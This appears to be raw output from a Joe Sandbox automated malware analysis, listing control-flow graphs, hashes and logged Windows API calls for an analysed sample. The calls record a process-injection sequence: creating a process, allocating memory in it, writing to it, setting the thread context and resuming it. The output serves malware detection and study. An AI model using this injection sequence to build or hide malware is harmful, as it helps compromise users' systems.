                                                                            control_flow_graph 516 4b16fd8-4b17039 520 4b17043-4b17047 call 4b16ba0 516->520 522 4b1704c-4b170b1 call 4b16ba0 call 4b16bb0 * 2 520->522 536 4b170bb-4b170bf call 4b16bc0 522->536 538 4b170c4-4b170f9 call 4b16bd4 536->538 545 4b17100-4b1710d 538->545 734 4b17110 call 4b1ff10 545->734 735 4b17110 call 4b1ff40 545->735 546 4b17113-4b17142 call 4b16be4 548 4b17147-4b171a6 call 4b16bf4 546->548 552 4b171ab-4b171da call 4b16c04 548->552 554 4b171df-4b171ec call 4b16c14 552->554 556 4b171f1-4b171ff 554->556 557 4b17204-4b17303 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 556->557 569 4b17308 557->569 570 4b17312-4b17393 call 4b16c24 call 4b16c34 569->570 580 4b17399-4b173ac 570->580 581 4b174df-4b17501 570->581 582 4b173b5-4b173de 580->582 583 4b173ae-4b173b4 580->583 591 4b17503-4b17509 581->591 592 4b1750f-4b1752b 581->592 584 4b17c93 582->584 585 4b173e4-4b17401 582->585 583->582 590 4b17c98-4b17cb9 584->590 585->584 587 4b17407-4b1741c 585->587 587->584 589 4b17422-4b1744b call 4b16c44 587->589 589->584 599 4b17451-4b1747a 589->599 736 4b17cbe call 2465ca4 590->736 737 4b17cbe call 246826a 590->737 594 4b1750b 591->594 595 4b1750d 591->595 603 4b17532-4b17549 592->603 594->592 595->592 597 4b17cc3-4b17d83 call 4b16d24 call 4b16d34 600 4b1747c 599->600 601 4b1747f-4b1748b 599->601 600->601 601->584 604 4b17491-4b174a7 601->604 608 4b1754f-4b17551 603->608 604->584 607 4b174ad-4b174c0 604->607 607->584 609 4b174c6-4b174d9 607->609 611 4b1755b-4b1755f 608->611 609->580 609->581 613 4b17565-4b17569 611->613 613->584 614 4b1756f-4b1757d 613->614 614->584 618 4b17583-4b1760c 614->618 634 4b17616-4b1761f 618->634 635 4b17628-4b17c92 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16c54 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16c64 call 4b16c74 call 4b16c84 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c94 call 4b16ca4 call 4b16cb4 call 4b16cc4 call 4b16cd4 call 4b16ce4 * 6 call 4b16cf4 call 4b16d04 call 4b16bf4 call 4b15480 call 4b16d14 634->635 734->546 735->546 736->597 737->597
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4b10000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$dq
                                                                            • API String ID: 0-452711968
                                                                            • Opcode ID: a77273bb094670e78463193705637ff608e9c635034d5c01577992f7f7473740
                                                                            • Instruction ID: ee42b1c80b9a0720b37fa6caacd7f7b4bf9fd771eeeba800b3e2cc17d02e7c35
                                                                            • Opcode Fuzzy Hash: a77273bb094670e78463193705637ff608e9c635034d5c01577992f7f7473740
                                                                            • Instruction Fuzzy Hash: A0824A30A10B05CFDB15EF74C854BAAB7B2FF89304F6186A9D449AB360DB75A985CF40
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 41fe49d75f02c7bee28d02d7e6e2ca0fe882f5122376460572a9e165c98ab115
                                                                            • Instruction ID: f04ae240e7cb89e1234f756bda227c3e51ca61a9036b4cac9ddd8c91030ac60e
                                                                            • Opcode Fuzzy Hash: 41fe49d75f02c7bee28d02d7e6e2ca0fe882f5122376460572a9e165c98ab115
                                                                            • Instruction Fuzzy Hash: 5832CC70B016148FDB59EBA9C468BAEBBF7AF89700F144469E106DB3A0CB34ED01CB51

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 885 6747ead-6747f4d 887 6747f86-6747fa6 885->887 888 6747f4f-6747f59 885->888 895 6747fdf-674800e 887->895 896 6747fa8-6747fb2 887->896 888->887 889 6747f5b-6747f5d 888->889 890 6747f80-6747f83 889->890 891 6747f5f-6747f69 889->891 890->887 893 6747f6d-6747f7c 891->893 894 6747f6b 891->894 893->893 897 6747f7e 893->897 894->893 904 6748047-6748101 CreateProcessA 895->904 905 6748010-674801a 895->905 896->895 898 6747fb4-6747fb6 896->898 897->890 899 6747fb8-6747fc2 898->899 900 6747fd9-6747fdc 898->900 902 6747fc4 899->902 903 6747fc6-6747fd5 899->903 900->895 902->903 903->903 906 6747fd7 903->906 916 6748103-6748109 904->916 917 674810a-6748190 904->917 905->904 907 674801c-674801e 905->907 906->900 909 6748020-674802a 907->909 910 6748041-6748044 907->910 911 674802c 909->911 912 674802e-674803d 909->912 910->904 911->912 912->912 914 674803f 912->914 914->910 916->917 927 67481a0-67481a4 917->927 928 6748192-6748196 917->928 930 67481b4-67481b8 927->930 931 67481a6-67481aa 927->931 928->927 929 6748198 928->929 929->927 933 67481c8-67481cc 930->933 934 67481ba-67481be 930->934 931->930 932 67481ac 931->932 932->930 936 67481de-67481e5 933->936 937 67481ce-67481d4 933->937 934->933 935 67481c0 934->935 935->933 938 67481e7-67481f6 936->938 939 67481fc 936->939 937->936 938->939 941 67481fd 939->941 941->941
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 067480EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: c368fe3ae89c04709743487e29f155dc5d5589e0fea9572323df4151d9a15a44
                                                                            • Instruction ID: a610b449fa79e14a4fc40619587abed510ede2395cc3563e1891604ad4f930c5
                                                                            • Opcode Fuzzy Hash: c368fe3ae89c04709743487e29f155dc5d5589e0fea9572323df4151d9a15a44
                                                                            • Instruction Fuzzy Hash: D8A17C71D00219CFDF54DFA8C885BEDBBB2BF48310F1485AAE819A7250DB749985CF92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 942 6747eb8-6747f4d 944 6747f86-6747fa6 942->944 945 6747f4f-6747f59 942->945 952 6747fdf-674800e 944->952 953 6747fa8-6747fb2 944->953 945->944 946 6747f5b-6747f5d 945->946 947 6747f80-6747f83 946->947 948 6747f5f-6747f69 946->948 947->944 950 6747f6d-6747f7c 948->950 951 6747f6b 948->951 950->950 954 6747f7e 950->954 951->950 961 6748047-6748101 CreateProcessA 952->961 962 6748010-674801a 952->962 953->952 955 6747fb4-6747fb6 953->955 954->947 956 6747fb8-6747fc2 955->956 957 6747fd9-6747fdc 955->957 959 6747fc4 956->959 960 6747fc6-6747fd5 956->960 957->952 959->960 960->960 963 6747fd7 960->963 973 6748103-6748109 961->973 974 674810a-6748190 961->974 962->961 964 674801c-674801e 962->964 963->957 966 6748020-674802a 964->966 967 6748041-6748044 964->967 968 674802c 966->968 969 674802e-674803d 966->969 967->961 968->969 969->969 971 674803f 969->971 971->967 973->974 984 67481a0-67481a4 974->984 985 6748192-6748196 974->985 987 67481b4-67481b8 984->987 988 67481a6-67481aa 984->988 985->984 986 6748198 985->986 986->984 990 67481c8-67481cc 987->990 991 67481ba-67481be 987->991 988->987 989 67481ac 988->989 989->987 993 67481de-67481e5 990->993 994 67481ce-67481d4 990->994 991->990 992 67481c0 991->992 992->990 995 67481e7-67481f6 993->995 996 67481fc 993->996 994->993 995->996 998 67481fd 996->998 998->998
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 067480EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 6d2637b4e95fb4c7a553a12017ffb575f316b43da688dafe97aafadc65696c2e
                                                                            • Instruction ID: c4626ba27d1b091151d1be78ec2c01887cff1c2b668e213c62c4e8a03369b038
                                                                            • Opcode Fuzzy Hash: 6d2637b4e95fb4c7a553a12017ffb575f316b43da688dafe97aafadc65696c2e
                                                                            • Instruction Fuzzy Hash: 0C917B71D0021DDFDB54DFA8C885BEDBBB2BF48310F1485AAE819A7240DB749985CF92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 999 246ad08-246ad17 1000 246ad43-246ad47 999->1000 1001 246ad19-246ad26 call 246a02c 999->1001 1003 246ad5b-246ad9c 1000->1003 1004 246ad49-246ad53 1000->1004 1008 246ad3c 1001->1008 1009 246ad28 1001->1009 1010 246ad9e-246ada6 1003->1010 1011 246ada9-246adb7 1003->1011 1004->1003 1008->1000 1056 246ad2e call 246af90 1009->1056 1057 246ad2e call 246afa0 1009->1057 1010->1011 1012 246addb-246addd 1011->1012 1013 246adb9-246adbe 1011->1013 1015 246ade0-246ade7 1012->1015 1016 246adc0-246adc7 call 246a038 1013->1016 1017 246adc9 1013->1017 1014 246ad34-246ad36 1014->1008 1018 246ae78-246af38 1014->1018 1021 246adf4-246adfb 1015->1021 1022 246ade9-246adf1 1015->1022 1019 246adcb-246add9 1016->1019 1017->1019 1049 246af40-246af6b GetModuleHandleW 1018->1049 1050 246af3a-246af3d 1018->1050 1019->1015 1023 246adfd-246ae05 1021->1023 1024 246ae08-246ae11 call 246a048 1021->1024 1022->1021 1023->1024 1030 246ae13-246ae1b 1024->1030 1031 246ae1e-246ae23 1024->1031 1030->1031 1032 246ae25-246ae2c 1031->1032 1033 246ae41-246ae45 1031->1033 1032->1033 1035 246ae2e-246ae3e call 246a058 call 246a068 1032->1035 1054 246ae48 call 246b290 1033->1054 1055 246ae48 call 246b2a0 1033->1055 1035->1033 1037 246ae4b-246ae4e 1040 246ae50-246ae6e 1037->1040 1041 246ae71-246ae77 1037->1041 1040->1041 1051 246af74-246af88 1049->1051 1052 246af6d-246af73 1049->1052 1050->1049 1052->1051 1054->1037 1055->1037 1056->1014 1057->1014
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0246AF5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: a53aa788e765b8a05a8d6acc7fbc77553fca3dc618cc450beaf53b03bbdc3d02
                                                                            • Instruction ID: f3bfa6edb3066cd3c6a97d2c351339674896865215fe71712b4aaf02b9467666
                                                                            • Opcode Fuzzy Hash: a53aa788e765b8a05a8d6acc7fbc77553fca3dc618cc450beaf53b03bbdc3d02
                                                                            • Instruction Fuzzy Hash: 1371F370A00B158FD724DF69D44476BBBF6FF88304F00892ED48AA7A50DB75E949CB92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1058 24658ec-24658f4 1059 24658fc-24659b9 CreateActCtxA 1058->1059 1061 24659c2-2465a1c 1059->1061 1062 24659bb-24659c1 1059->1062 1069 2465a1e-2465a21 1061->1069 1070 2465a2b-2465a2f 1061->1070 1062->1061 1069->1070 1071 2465a40-2465a70 1070->1071 1072 2465a31-2465a3d 1070->1072 1076 2465a22-2465a29 1071->1076 1077 2465a72-2465a77 1071->1077 1072->1071 1076->1070 1078 2465a9b 1076->1078 1079 2465ae9-2465af4 1077->1079 1078->1079
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 024659A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 930181643d0251594a51d0379ed988344715e5be141a123a628bac45c75f0faf
                                                                            • Instruction ID: dfe782976f0ae0cf6fe4745957a926b2a8bf55b67ca4005c63c8818b3ee0210d
                                                                            • Opcode Fuzzy Hash: 930181643d0251594a51d0379ed988344715e5be141a123a628bac45c75f0faf
                                                                            • Instruction Fuzzy Hash: 4741DFB0D00719CADF24DFA9C8847DEBBF1BF48314F24806AD419AB251DB76694ACF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1080 24644b0-24659b9 CreateActCtxA 1083 24659c2-2465a1c 1080->1083 1084 24659bb-24659c1 1080->1084 1091 2465a1e-2465a21 1083->1091 1092 2465a2b-2465a2f 1083->1092 1084->1083 1091->1092 1093 2465a40-2465a70 1092->1093 1094 2465a31-2465a3d 1092->1094 1098 2465a22-2465a29 1093->1098 1099 2465a72-2465a77 1093->1099 1094->1093 1098->1092 1100 2465a9b 1098->1100 1101 2465ae9-2465af4 1099->1101 1100->1101
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 024659A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: a6e86930a6b72f5bd2fa7bb0ad6df1a72b31bf4a17de3c70101c2efdbb3c9990
                                                                            • Instruction ID: 226c4802c6fb7057c9d9801b9b38236cf1f945d5ad85df1f73585ec804a797d2
                                                                            • Opcode Fuzzy Hash: a6e86930a6b72f5bd2fa7bb0ad6df1a72b31bf4a17de3c70101c2efdbb3c9990
                                                                            • Instruction Fuzzy Hash: 3741D0B0C00719CBDB24DFA9C848B9EBBF5BF49304F60806AD409AB251DB766949CF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1102 4b14040-4b1407c 1103 4b14082-4b14087 1102->1103 1104 4b1412c-4b1414c 1102->1104 1105 4b14089-4b140c0 1103->1105 1106 4b140da-4b14112 CallWindowProcW 1103->1106 1111 4b1414f-4b1415c 1104->1111 1112 4b140c2-4b140c8 1105->1112 1113 4b140c9-4b140d8 1105->1113 1107 4b14114-4b1411a 1106->1107 1108 4b1411b-4b1412a 1106->1108 1107->1108 1108->1111 1112->1113 1113->1111
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B14101
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4b10000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: c1024348a240e83e9779a479988e6094f39a79f0709abcc581003e901fcb787f
                                                                            • Instruction ID: 64210f98159338a4a9b35836c771cdd5d5b10f85bd1beddc7f81bb10381a00d9
                                                                            • Opcode Fuzzy Hash: c1024348a240e83e9779a479988e6094f39a79f0709abcc581003e901fcb787f
                                                                            • Instruction Fuzzy Hash: 774157B5A00309DFCB14CF99C848AABBBF5FB88314F24C499D519AB321D774A845CFA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1116 6747c28-6747c7e 1119 6747c80-6747c8c 1116->1119 1120 6747c8e-6747ccd WriteProcessMemory 1116->1120 1119->1120 1122 6747cd6-6747d06 1120->1122 1123 6747ccf-6747cd5 1120->1123 1123->1122
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06747CC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 1b6fcbde681ced9b30fc4ec7856479fd5ec817ddfa2df4e43ee2905aefd1c080
                                                                            • Instruction ID: c730c93c1de9d17f76060b7b1209177af46a8233a7f84b88617e85f9fd2cfb2e
                                                                            • Opcode Fuzzy Hash: 1b6fcbde681ced9b30fc4ec7856479fd5ec817ddfa2df4e43ee2905aefd1c080
                                                                            • Instruction Fuzzy Hash: 6B2126B19003099FCB54DFA9C885BEEBBF5FF48310F108429E919A7240D778A944CBA4

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1127 6747c30-6747c7e 1129 6747c80-6747c8c 1127->1129 1130 6747c8e-6747ccd WriteProcessMemory 1127->1130 1129->1130 1132 6747cd6-6747d06 1130->1132 1133 6747ccf-6747cd5 1130->1133 1133->1132
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06747CC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 1240569a4308b753f76ec59b469f7402fe5277b77e7c86423db5efcb95edccfb
                                                                            • Instruction ID: 4e2ae1e14a862be349c9e11ea257587e0a9be8173c5c050016113f5a5501e13d
                                                                            • Opcode Fuzzy Hash: 1240569a4308b753f76ec59b469f7402fe5277b77e7c86423db5efcb95edccfb
                                                                            • Instruction Fuzzy Hash: A72127B19003099FCB14DFA9C885BEEBBF5FF48310F108429E919A7240C7789944CBA4
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06747DA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: fc3b48df52e060e59284e5e8a416dc65865cb6798db1c82f69c724941f454bd9
                                                                            • Instruction ID: dcce7bbe5ba2c1a6f0eb8dbd08afd7dd9d60650320728199d61c5e106492a0a9
                                                                            • Opcode Fuzzy Hash: fc3b48df52e060e59284e5e8a416dc65865cb6798db1c82f69c724941f454bd9
                                                                            • Instruction Fuzzy Hash: 7D2136B1C003099FCB10DFAAC885AEEBBF5FF48310F108429E518A3240C739A905CFA4
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0246D5B6,?,?,?,?,?), ref: 0246D677
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: a5df79f7653335695132fee6b01c2754f842d4f06cffd2e8f3a61ce1084b56f5
                                                                            • Instruction ID: 744f4d9353ee4ea3f9cdeca13f8d617236a460c3e92f158bedb96a7c14c28c84
                                                                            • Opcode Fuzzy Hash: a5df79f7653335695132fee6b01c2754f842d4f06cffd2e8f3a61ce1084b56f5
                                                                            • Instruction Fuzzy Hash: E421E3B5D00209EFDB10CF9AD984AEEBBF4EB48314F14841AE918A7350D374A954CFA5
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06747B16
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: a5ea79327e0f2110b3ecedcad38aedb5029c3591d86af9eb0994d6bc286004e3
                                                                            • Instruction ID: c7f62c2a94cf4d8196c171c36fb854c204794850db94613f254f3902482a796f
                                                                            • Opcode Fuzzy Hash: a5ea79327e0f2110b3ecedcad38aedb5029c3591d86af9eb0994d6bc286004e3
                                                                            • Instruction Fuzzy Hash: B3215971D003099FCB14DFAAC885BAEBBF5EF48320F148429D519A7240C778A944CFA4
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0246D5B6,?,?,?,?,?), ref: 0246D677
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: e1980ddbb0e238afe810c4d838887a53b00a9068dcd34aaad517d139dcdccbfc
                                                                            • Instruction ID: d9058d59b00f78aef935d309b095d664ca3ea6d03326250ceb36d2d477c50af7
                                                                            • Opcode Fuzzy Hash: e1980ddbb0e238afe810c4d838887a53b00a9068dcd34aaad517d139dcdccbfc
                                                                            • Instruction Fuzzy Hash: A421E3B5900209EFDB10CFAAD984ADEBBF5EB48324F14841AE918A3350C374A945CF65
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06747DA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 4776c11d160541aeb99d440c8ba9df63eb816188e31418a454f98955472031b3
                                                                            • Instruction ID: 399e2bd879b86394c28f0d3e41aaf92252d099e7b7b93a5da9f9f51c659b4243
                                                                            • Opcode Fuzzy Hash: 4776c11d160541aeb99d440c8ba9df63eb816188e31418a454f98955472031b3
                                                                            • Instruction Fuzzy Hash: 742128B1D003499FCB10DFAAC845AEEFBF5FF48310F508429E559A7240C734A944DBA5
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06747B16
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 80983db05e2b9fee182ba507724caa9ae8ea34b569737d3a9b6e3945282cf6da
                                                                            • Instruction ID: ca70a3943b72cdfc3bb9e6c59998e578882ddcc83db2138b8a718721f22efa4f
                                                                            • Opcode Fuzzy Hash: 80983db05e2b9fee182ba507724caa9ae8ea34b569737d3a9b6e3945282cf6da
                                                                            • Instruction Fuzzy Hash: 222179B1D003098FCB14DFAAC8857EEBBF5EF48320F10842AD419A7240CB78A944CFA4
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06747BDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 5dde520abf31562c5804eff9de7f4328f18f0d506ac9ad056a2372d4107ecac3
                                                                            • Instruction ID: a996e9c5e0354553c3a5cd1dca3d927bf599c9c36deebdb54cdbd226904a7734
                                                                            • Opcode Fuzzy Hash: 5dde520abf31562c5804eff9de7f4328f18f0d506ac9ad056a2372d4107ecac3
                                                                            • Instruction Fuzzy Hash: 45115672900209DFCB10DFAAC845ADEBBF5EB88320F248819E519A7250CB35A940CFA4
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06747BDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: e78a8d156f6ecf5dbe5326b1132bd8798c3d2433d26daa7c2c039dab6866243b
                                                                            • Instruction ID: 3be633b08b20c80fc48cffd8ecb65def928ac45191a03b04d26b7bdd7dc8f554
                                                                            • Opcode Fuzzy Hash: e78a8d156f6ecf5dbe5326b1132bd8798c3d2433d26daa7c2c039dab6866243b
                                                                            • Instruction Fuzzy Hash: 16113771900249DFCB14DFAAC845ADFBFF5EF88320F248819E519A7250CB75A944CFA5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 2d09cc12bef049824b7c138e6e047076bacee53dc29968be0dfd16aabcf3b74f
                                                                            • Instruction ID: e09ba7c0d97773e2290abe6107991b272f2d223f3c30d84d34637bec553ce293
                                                                            • Opcode Fuzzy Hash: 2d09cc12bef049824b7c138e6e047076bacee53dc29968be0dfd16aabcf3b74f
                                                                            • Instruction Fuzzy Hash: 571128B1D003498FDB14DFAAC8497DEFBF5EB88324F248819D519A7240CB79A944CBA5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 1b82d26cf012150ea28a1978801bc5c10d1fe3bbca6f607f0f1e18b7ae664194
                                                                            • Instruction ID: 6c72bcae39641221c2c3a92d84781284541e78320e42db779e8a40d5dd5dbb38
                                                                            • Opcode Fuzzy Hash: 1b82d26cf012150ea28a1978801bc5c10d1fe3bbca6f607f0f1e18b7ae664194
                                                                            • Instruction Fuzzy Hash: 7E113AB1D003498FCB14DFAAC8497DEFBF5EB88324F248819D519A7240CB75A944CBA5
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0674A71D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 0d6fdc9f00f2287605f7f48b3ddd7019b951f0ea2714fbcc6a67eb5e7e617cd1
                                                                            • Instruction ID: 656bc02d744b26d9e73c4aac82398e06d0fe2d65ea7d369b37444c5711400761
                                                                            • Opcode Fuzzy Hash: 0d6fdc9f00f2287605f7f48b3ddd7019b951f0ea2714fbcc6a67eb5e7e617cd1
                                                                            • Instruction Fuzzy Hash: CB1106B5800349DFDB20DF9AD889BDFBBF8EB48320F10841AE519A7640D375A544CFA5
